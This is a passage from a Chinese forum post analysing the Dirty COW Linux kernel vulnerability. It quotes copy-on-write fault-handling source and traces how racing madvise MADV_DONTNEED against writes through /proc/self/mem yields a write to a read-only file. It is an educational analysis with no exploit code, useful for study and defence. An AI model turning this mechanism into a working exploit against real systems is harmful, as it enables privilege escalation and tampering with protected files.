            /*
             * The page is all ours.  Move it to our anon_vma so
             * the rmap code will not search our parent or siblings.
             * Protected against the rmap code by the page lock.
             */
            page_move_anon_rmap(old_page, vma, address);//移动page到一个匿名vma
            unlock_page(old_page);
            return wp_page_reuse(mm, vma, address, page_table, ptl,
                         orig_pte, old_page, 0, 0);
        }
        unlock_page(old_page);
    } else if (unlikely((vma->vm_flags & (VM_WRITE|VM_SHARED)) ==
                    (VM_WRITE|VM_SHARED))) {
        return wp_page_shared(mm, vma, address, page_table, pmd,
                      ptl, orig_pte, old_page);
    }
 
    /*
     * Ok, we need to copy. Oh, well..
     */
    page_cache_get(old_page);    //增加引用计数
 
    pte_unmap_unlock(page_table, ptl);
    return wp_page_copy(mm, vma, address, page_table, pmd,
                orig_pte, old_page);
}
1
2
3
4
5
6
handle_pte_fault
    -> do_fault(不是匿名页,调入)
        -> do_cow_fault(由于是一个私有的写时复制的)
            -> do_set_pte(write=1)
                -> maybe_mkwrite() 由于不可写所以不做写操作
                    -> pte_mkdirty(将页标脏,但此时还是只读状态)

结束后页调入,同时标脏。

第二次page fault(foll_flags对应的权限违反内存页的权限)

在handle_pte_fault()中,如果触发异常的页存在于主存中,那么该异常往往是由写了一个只读页触发的,此时需要进行COW(写时复制操作)。也就是为自己重新分配一个页框,并把之前的数据复制到页框中去,再写。

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
/*
 * Handle write page faults for pages that can be reused in the current vma
 *
 * This can happen either due to the mapping being with the VM_SHARED flag,
 * or due to us being the last reference standing to the page. In either
 * case, all we need to do here is to mark the page as writable and update
 * any related book-keeping.
 */
static inline int wp_page_reuse(struct mm_struct *mm,
            struct vm_area_struct *vma, unsigned long address,
            pte_t *page_table, spinlock_t *ptl, pte_t orig_pte,
            struct page *page, int page_mkwrite,
            int dirty_shared)
    __releases(ptl)
{
    pte_t entry;
    /*
     * Clear the pages cpupid information as the existing
     * information potentially belongs to a now completely
     * unrelated process.
     */
    if (page)
        page_cpupid_xchg_last(page, (1 << LAST_CPUPID_SHIFT) - 1);
 
    flush_cache_page(vma, address, pte_pfn(orig_pte));
    entry = pte_mkyoung(orig_pte);                    //标记_PAGE_ACCESSED位
    entry = maybe_mkwrite(pte_mkdirty(entry), vma); //只读,标脏
    if (ptep_set_access_flags(vma, address, page_table, entry, 1))
        update_mmu_cache(vma, address, page_table);
    pte_unmap_unlock(page_table, ptl);
 
    if (dirty_shared) {
        struct address_space *mapping;
        int dirtied;
 
        if (!page_mkwrite)
            lock_page(page);
 
        dirtied = set_page_dirty(page);
        VM_BUG_ON_PAGE(PageAnon(page), page);
        mapping = page->mapping;
        unlock_page(page);
        page_cache_release(page);
 
        if ((dirtied || page_mkwrite) && mapping) {
            /*
             * Some device drivers do not set page.mapping
             * but still dirty their pages
             */
            balance_dirty_pages_ratelimited(mapping);
        }
 
        if (!page_mkwrite)
            file_update_time(vma->vm_file);
    }
 
    return VM_FAULT_WRITE;
}
1
2
3
4
5
6
7
8
9
10
11
    handle_pte_fault
        发现页此时已经调入但是foll_flags语义冲突,调用do_wp_page
            do_wp_page(用于处理写时复制)
            PageAnon(old_page) && !PageKsm(old_page) 判断是否为匿名页以及是否是ksm页面
            reuse_swap_page(old_page) 判断&page->_mapcount是否为0,是的话则表明只有一个进程使用该匿名页
                wp_page_reuse() 因为之前已经做过cow操作了,所以这里直接调用
                return VM_FAULT_WRITE 0x0008
 
faultin_page()
if ((ret & VM_FAULT_WRITE) && !(vma->vm_flags & VM_WRITE))
        *flags &= ~FOLL_WRITE;        返回faultin_page后进入if,VM_WRITE为0代表此内存区域是不可写的。此时COW已经完成。将FOLL_WRITE位置重新置为0并返回到get_user_pages函数中。

第三/四次page fault

第二次page fault结束后,FOLL_WRITE已经被置0.此时已经不再需要可写权限。

 

所以正常情况下,此时会拿到对应的内存页,然后可以直接做写操作。但是这个写操作是在mapped memory的,不会影响正常的磁盘文件。

 

但是这个时候如果出现线程madivseThread ,他将对应的mmap出来的空间设置为MADV_DONTNEED即在接下来不会被使用。此时内核将mapped memory对应的页表项置空(立刻换出对应的内存页)。第四次产生page fault

 

这样当再次write的时候,会触发page fault,由do_fault再次调页。而由于此时FOLL_WRITE为0,所以不会像第一次那样调入后由于写操作产生语义冲突。而是可以正常的返回对应的页,而接下来的写入操作会被同步到只读的文件中。从而造成了越权写。(因为没有做COW)

1
2
do_fault()
    do_read_fault() 此时if (!(flags & FAULT_FLAG_WRITE))成立

流程总结

正常流程:

1
2
3
尝试利用/proc/self/mem写入一只读内存
->page fault(缺页)
->page fault (语义冲突),发现要求写权限,进入do_cow_fault()做COW -> 创建对应的COW副本 -> 清除FOLL_WRITE标志 -> 向COW副页写

漏洞流程:

1
2
3
4
5
尝试利用/proc/self/mem写入一只读内存
->page fault(缺页)
->page fault(语义冲突),发现要求写权限,进入do_cow_fault()做COW -> 创建对应的COW副本 -> 清除FOLL_WRITE标志
->madivse将清除了FOLL_WRITE标志的页迅速调出
->page fault调入,此时已经不需要写权限,do_read_fault()直接获取文件对应内存页,越权写。

参考

https://github.com/dirtycow/dirtycow.github.io/wiki/VulnerabilityDetails

 

Copy on Write

 

https://blog.csdn.net/qq_26768741/article/details/54375524

 

mm_struct

 

https://www.cnblogs.com/wanpengcoder/p/11761063.html

 

Linux分页机制之分页机制的实现详解

 

Linux内存管理pagefault

 

用户空间缺页异常pte_handle_fault()分析--(下)--写时复制

 

KSM (Kernel Samepage Merging)

 

缺页异常的几种情况处理机制简介


【公告】看雪团队招聘安全工程师,将兴趣和工作融合在一起!看雪20年安全圈的口碑,助你快速成长!

最后于 2021-1-13 13:19 被ScUpax0s编辑 ,原因:
收藏
点赞6
打赏
分享
最新回复 (1)
雪    币: 235
能力值: ( LV1,RANK:0 )
在线值:
发帖
回帖
粉丝
K1ose 活跃值 2021-11-21 19:35
2
0
mm_struct里面应该是mm_count,而不是mm_counter,虽然不是什么大问题
游客
登录 | 注册 方可回帖
返回